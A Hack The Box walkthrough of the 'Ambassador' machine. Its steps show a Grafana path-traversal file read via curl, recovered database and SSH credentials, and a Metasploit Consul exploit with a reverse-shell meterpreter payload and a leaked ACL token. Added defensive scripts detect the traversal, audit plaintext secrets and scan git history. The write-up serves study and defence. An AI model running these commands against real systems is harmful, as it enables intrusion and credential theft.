Preface
Difficulty: Medium, an online target machine on the Hack The Box site. The techniques covered in this article are: arbitrary file read in Grafana, downloading files with curl, SSH local port forwarding, and command execution through Consul.
Target machine address: 10.10.11.183
Kali address: 10.10.14.26
1. Web part
1) On the Active Machines page, filter for medium difficulty and pick the first machine, Ambassador.
2) Since this is a target machine, scan all ports directly, and run fscan at the same time. Port 22 being open indicates a Linux host; port 80, port 3000 (the Grafana system) and port 3306 are also open.
nmap -T4 -p- 10.10.11.183
3) The fscan result shows no weak passwords on SSH or MySQL.
./fscan_amd64 -h 10.10.11.183
4) Port 3000 turns out to be the Grafana system. A first attempt with a weak password failed. Then I searched for historical vulnerabilities and found an arbitrary file read, but exploitation failed.
5) Take a look at port 3306 and phpMyAdmin. The output is garbled, but the operating system version can roughly be made out.
6) Visit port 80, http://10.10.11.183/: the page says to use the developer account for SSH and that DevOps will provide the password. If you don't understand it yet, leave it alone for now.
7) Directory scanning was performed, but nothing useful was found.
8) Stuck, I tried Grafana's vulnerability again, this time searching with searchsploit. Search for grafana, pick the arbitrary file read exploit, copy it to the current directory, run it, and it works!!!
searchsploit grafana
searchsploit -m multiple/webapps/50581.py
python3 50581.py -H http://10.10.11.183:3000
9) With arbitrary file read, read the configuration file first. A Google search shows that the configuration file is /etc/grafana/grafana.ini.
10) The database file is too large to read this way, so download it directly.
curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
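The curl command above only works because the client sends the dotted path unnormalized, so the traversal is visible verbatim in Grafana's access log or the reverse proxy in front of it. As an added example that is not part of the original writeup, the following script scans combined-format web log lines (constructed sample data, not real traffic) for requests under /public/plugins/ whose path climbs above the plugin directory, including percent-encoded variants. The log format and the sample lines are assumptions; the detection logic is generic.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in nginx/Apache combined format; not real traffic.
SAMPLE_LOG = """\
10.10.14.26 - - [01/Jan/2023:10:00:01 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.10.14.26 - - [01/Jan/2023:10:00:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 86016 "-" "curl/7.88.1"
10.10.14.26 - - [01/Jan/2023:10:00:03 +0000] "GET /public/plugins/alertlist/..%2f..%2f..%2fetc/grafana/grafana.ini HTTP/1.1" 200 4096 "-" "python-requests/2.28"
10.10.14.26 - - [01/Jan/2023:10:00:04 +0000] "GET /login HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
PLUGIN_ROOT = "/public/plugins/"


def escapes_root(relative_path):
    """Walk the path segments; True if a '..' ever climbs above the starting directory."""
    depth = 0
    for seg in relative_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def is_plugin_traversal(raw_path):
    """True if a request under /public/plugins/<plugin>/ escapes the plugin directory."""
    # Drop the query string and decode percent-encoding once (%2e%2e, %2f, ...).
    path = unquote(raw_path.split("?", 1)[0])
    if not path.startswith(PLUGIN_ROOT):
        return False
    plugin, _, tail = path[len(PLUGIN_ROOT):].partition("/")
    if not plugin or not tail:
        return False
    return escapes_root(tail)


def find_traversal_requests(log_text):
    """Return one record per log line whose request path is a plugin-directory traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and is_plugin_traversal(m.group("path")):
            hits.append({
                "path": m.group("path"),
                "status": int(m.group("status")),
                "agent": m.group("agent"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit["status"], hit["agent"], hit["path"])
```

A 200 response with a non-trivial body size on such a path means the read succeeded, so the grafana.db and grafana.ini exposed by it should be treated as compromised and every credential they contain rotated, in addition to upgrading Grafana to a release that normalizes the path before serving plugin files.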
11) According to the hints in grafana.ini, the database can be MySQL, PostgreSQL, or SQLite3. We opened grafana.db with sqlite3 and found the MySQL account and credentials: grafana/dontStandSoCloseToMe63221!
12) After connecting to the database, check the current user and find the account password: developer/anEnglishManInNewYork027468.
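The reason step 11 works is that Grafana's data_source table can hold a data source password in a plaintext column. As an added example that is not from the original writeup, here is the audit an administrator can run against a copy of grafana.db to list which data sources store their credential in plaintext, which use the encrypted secure_json_data field, and which have none. The table is a constructed, simplified subset of the real schema with sample rows; the column names used are ones that exist in Grafana, but the data is invented.

```python
import sqlite3


def build_sample_db():
    """Constructed in-memory stand-in for grafana.db (simplified data_source table, sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        """
        CREATE TABLE data_source (
            id INTEGER PRIMARY KEY,
            name TEXT, type TEXT, url TEXT,
            user TEXT, password TEXT, secure_json_data TEXT)
        """
    )
    conn.executemany(
        "INSERT INTO data_source VALUES (?,?,?,?,?,?,?)",
        [
            # legacy plaintext password column populated (sample value, not a real credential)
            (1, "mysql.yaml", "mysql", "localhost:3306", "grafana", "Pl4intext-sample-only", "{}"),
            # no credential at all
            (2, "prometheus", "prometheus", "http://localhost:9090", "", "", "{}"),
            # credential kept only in the encrypted field (placeholder blob)
            (3, "loki", "loki", "http://localhost:3100", "svc",
             "", '{"basicAuthPassword":"<encrypted-blob>"}'),
        ],
    )
    conn.commit()
    return conn


def audit_datasource_secrets(conn):
    """One finding per data source, classifying how its credential is stored on disk."""
    findings = []
    query = "SELECT id, name, type, user, password, secure_json_data FROM data_source ORDER BY id"
    for ds_id, name, ds_type, user, password, secure in conn.execute(query):
        if password:
            storage = "PLAINTEXT"   # readable by anyone who obtains the file
        elif secure and secure.strip() not in ("", "{}"):
            storage = "ENCRYPTED"   # encrypted with the secret_key from grafana.ini
        else:
            storage = "NONE"
        findings.append({"id": ds_id, "name": name, "type": ds_type,
                         "user": user, "storage": storage})
    return findings


def plaintext_datasources(conn):
    """Just the names of data sources that must be migrated and have their password rotated."""
    return [f["name"] for f in audit_datasource_secrets(conn) if f["storage"] == "PLAINTEXT"]


if __name__ == "__main__":
    db = build_sample_db()
    for f in audit_datasource_secrets(db):
        print(f"{f['id']:>3} {f['storage']:<10} {f['type']:<12} {f['name']} (user={f['user']!r})")
```

Run against a real file, replace the in-memory connection with sqlite3.connect("grafana.db"). Because the encryption key for secure_json_data lives in grafana.ini, which the same file read exposes, moving a credential into the encrypted field is hardening, not a substitute for rotating it after an incident like this one.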
13) Following the hint on the port 80 page, log in to the SSH server with that account and password.
2. Privilege escalation part
1) The kernel version cannot be used to escalate privileges.
2) sudo and SUID binaries cannot be used to escalate privileges either.
sudoedit -s /
find / -user root -perm -4000 -print 2>/dev/null
3) Scheduled tasks and the other usual routes cannot be used to escalate privileges either.
4) Check tmp, opt and the other usual directories. There are two folders in opt; my-app contains a .git directory. Checking the git log reveals that a Consul service is running. Not knowing what it is, I looked it up on Baidu.
5) It turned out there is a remote command execution vulnerability with a module in MSF, but every exploit attempt failed.
6) Finding the reason: the error is a failure connecting to the Consul API. Searching shows that port 8500 is not exposed. I used SSH to set up a local port forward directly, forwarding port 8500 of the target machine to local port 8500.
ssh -L 8500:0.0.0.0:8500 developer@10.10.11.183 # then enter the password
7) Then use MSF to get a reverse shell directly, with root privileges.
msfconsole -q -x "use multi/misc/consul_service_exec;
set payload linux/x86/meterpreter/reverse_tcp;
set rhosts 127.0.0.1;
set lhost 10.10.14.26;
# the acl_token here is at the bottom of the second screenshot in step 4 (the git log)
set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5;
set lport 4444; exploit"
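The root cause of the escalation is step 4: a Consul ACL token committed to a repository and left in its git history, which step 7 then reuses. As an added example that is not part of the original writeup, the script below does the check a repository owner should run before this happens: it walks `git log -p` output and flags added or removed lines that contain a UUID-shaped token or a `token`/`acl_token`/`password`/`secret` assignment with a literal value. The git log text and the placeholder token in it are constructed, not the target's history; scanning removed lines as well as added ones matters because a token deleted in a later commit is still recoverable from history.

```python
import re

# Constructed `git log -p` output with an obviously fake placeholder token.
SAMPLE_GIT_LOG = """\
commit 0000000000000000000000000000000000000000
Author: devops <devops@example.invalid>
Date:   Mon Jan 2 10:00:00 2023 +0000

    config script for deploy

diff --git a/config.ru b/config.ru
--- a/config.ru
+++ b/config.ru
@@ -10,5 +10,6 @@
 require 'consul'
-client = Consul::Client.new(token: ENV['CONSUL_TOKEN'])
+client = Consul::Client.new(token: '11111111-2222-3333-4444-555555555555')
+# TODO move token back to env
 client.register
"""

# Consul ACL tokens are UUIDs; many other secrets look like assignments of a literal.
UUID_RE = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I
)
ASSIGN_RE = re.compile(r"(?i)\b(token|acl_token|password|secret)\b\s*[:=]\s*['\"]?([^'\"\s,)]+)")


def classify_line(body):
    """Return the kinds of secret-looking content found in one diff line (may be empty)."""
    kinds = []
    if UUID_RE.search(body):
        kinds.append("uuid-token")
    m = ASSIGN_RE.search(body)
    # A value read from the environment (ENV[...], os.environ) is the safe pattern, not a leak.
    if m and not m.group(2).upper().startswith(("ENV", "OS.ENVIRON")):
        kinds.append(f"{m.group(1).lower()}-assignment")
    return kinds


def scan_git_history(log_text):
    """Walk `git log -p` text; report every added/removed line that looks like it carries a secret."""
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[6:]
        elif line.startswith(("+++", "---")):
            continue                      # file headers, not content
        elif line and line[0] in "+-":    # added or removed content line
            body = line[1:]
            kinds = classify_line(body)
            if kinds:
                findings.append({"commit": (commit or "")[:12], "file": path,
                                 "kinds": kinds, "line": body.strip()})
    return findings


if __name__ == "__main__":
    for f in scan_git_history(SAMPLE_GIT_LOG):
        print(f"{f['commit']} {f['file']}: {', '.join(f['kinds'])} -> {f['line']}")
```

To use it on a real repository, pipe `git log -p --all` into the script. Any hit means the token should be treated as leaked and revoked in Consul, and the repository history rewritten or the secret moved to the environment, which is exactly what the `ENV['CONSUL_TOKEN']` line the sample commit removed had been doing.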